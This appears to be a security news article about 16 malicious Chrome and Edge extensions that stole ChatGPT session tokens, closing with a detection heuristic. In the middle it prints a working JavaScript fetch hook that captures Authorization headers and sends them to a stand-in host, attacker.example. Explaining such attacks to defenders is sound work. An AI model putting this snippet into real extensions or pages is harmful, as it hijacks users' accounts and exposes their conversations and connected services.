The promise of enhancing a user’s digital experience with convenient, feature-rich browser extensions has been dangerously subverted by threat actors now targeting the burgeoning field of artificial intelligence platforms. Recent security findings have brought to light a significant campaign involving 16 malicious browser extensions, meticulously designed to steal session authentication tokens from ChatGPT users and effectively hand attackers complete control of the affected accounts. These deceptive add-ons were hiding in plain sight: 15 were available on the Chrome Web Store and one on the Microsoft Edge Add-ons marketplace. At the time of their discovery, the extensions had already compromised the accounts of approximately 900 users, demonstrating a potent and active threat to anyone using the popular AI service. The incident underscores a critical vulnerability not within the AI platform itself, but in the third-party ecosystem that surrounds it, one that preys on users’ trust in tools advertised to improve their productivity.
The Anatomy of the Attack
The method employed by these malicious extensions, often deceptively marketed as “ChatGPT mods,” is a clever abuse of browser extension permissions rather than an exploit of any vulnerability in ChatGPT’s infrastructure. Once a user installs one of these add-ons, it injects a script into the page’s own JavaScript environment on the ChatGPT site. The script’s primary function is to intercept the outbound network requests the page makes, which it achieves by “hooking” window.fetch, the standard web API for fetching resources. The malicious code inspects every intercepted request for an Authorization header, the component that authenticates the user’s session. Upon detecting one, the script immediately extracts the user’s session token and transmits it to a remote, attacker-controlled server. The entire process happens silently in the background, giving the user no indication that their credentials have just been compromised.
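To make the mechanism concrete, the sketch below shows the fetch-hooking pattern in the form a page-injected script might take. It is an illustration only: the exfiltration URL is hypothetical, real campaigns heavily obfuscate this logic, and a Chrome content script would first need to run in the page’s “main world” (rather than its default isolated world) for the hook to affect the page’s own requests.

```javascript
// Illustrative sketch of the hook; all names and URLs are hypothetical.
const originalFetch = window.fetch;

window.fetch = async function (input, init) {
  // Requests can carry headers either on the init object
  // (fetch(url, { headers })) or on a Request instance.
  let authHeader = null;
  if (init && init.headers) {
    authHeader = new Headers(init.headers).get("authorization");
  } else if (input instanceof Request) {
    authHeader = input.headers.get("authorization");
  }

  if (authHeader) {
    // Silently forward the captured session token to an
    // attacker-controlled server (hypothetical endpoint).
    navigator.sendBeacon(
      "https://attacker.example/collect",
      JSON.stringify({ token: authHeader })
    );
  }

  // Pass the call through unchanged so the page behaves normally.
  return originalFetch.call(this, input, init);
};
```

The passthrough at the end is what makes the theft invisible: ChatGPT continues to work exactly as before, while every Authorization header flows to the attacker as a side effect.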
Broader Implications and Persistent Threats
The consequences of a stolen session token are far-reaching: an attacker can fully impersonate the legitimate user, gaining unrestricted access to the account, including the entire conversation history, which may contain sensitive personal or corporate information. The risk extends beyond the AI platform itself, potentially exposing any third-party applications connected to the ChatGPT account, such as Google Drive, Slack, or GitHub. Alarmingly, one of the malicious extensions, named “ChatGPT folder, voice download, prompt manager, free tools – ChatGPT Mods,” had even earned a “Featured” badge in the Chrome Web Store, suggesting it passed a review process meant to surface safe and useful tools. The incident is part of a broader, more troubling trend of attackers leveraging browser extensions as a primary vector for stealing sensitive data. Similar attacks have targeted authenticated sessions for enterprise platforms such as Workday and NetSuite, and another “Featured” extension was found exfiltrating conversations from multiple AI platforms, including Google Gemini and Microsoft Copilot. These cases demonstrate that organizations should treat any extension that integrates with authenticated AI platforms as a high-risk vector and deploy behavior-based monitoring to detect this kind of suspicious activity.
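On the detection side, one coarse client-side heuristic is to check whether window.fetch still resolves to native browser code. The sketch below illustrates the idea; it is a weak signal (hooks can be hidden, and some legitimate extensions also wrap fetch), so it complements rather than replaces extension allowlisting and network-level monitoring.

```javascript
// Heuristic check, e.g. from the DevTools console on an open
// ChatGPT tab: a native fetch stringifies to "[native code]".
// Calling Function.prototype.toString directly sidesteps a hook
// that shadows its own toString method.
function fetchLooksNative() {
  return Function.prototype.toString
    .call(window.fetch)
    .includes("[native code]");
}

if (!fetchLooksNative()) {
  console.warn("window.fetch appears to be wrapped; review installed extensions.");
}
```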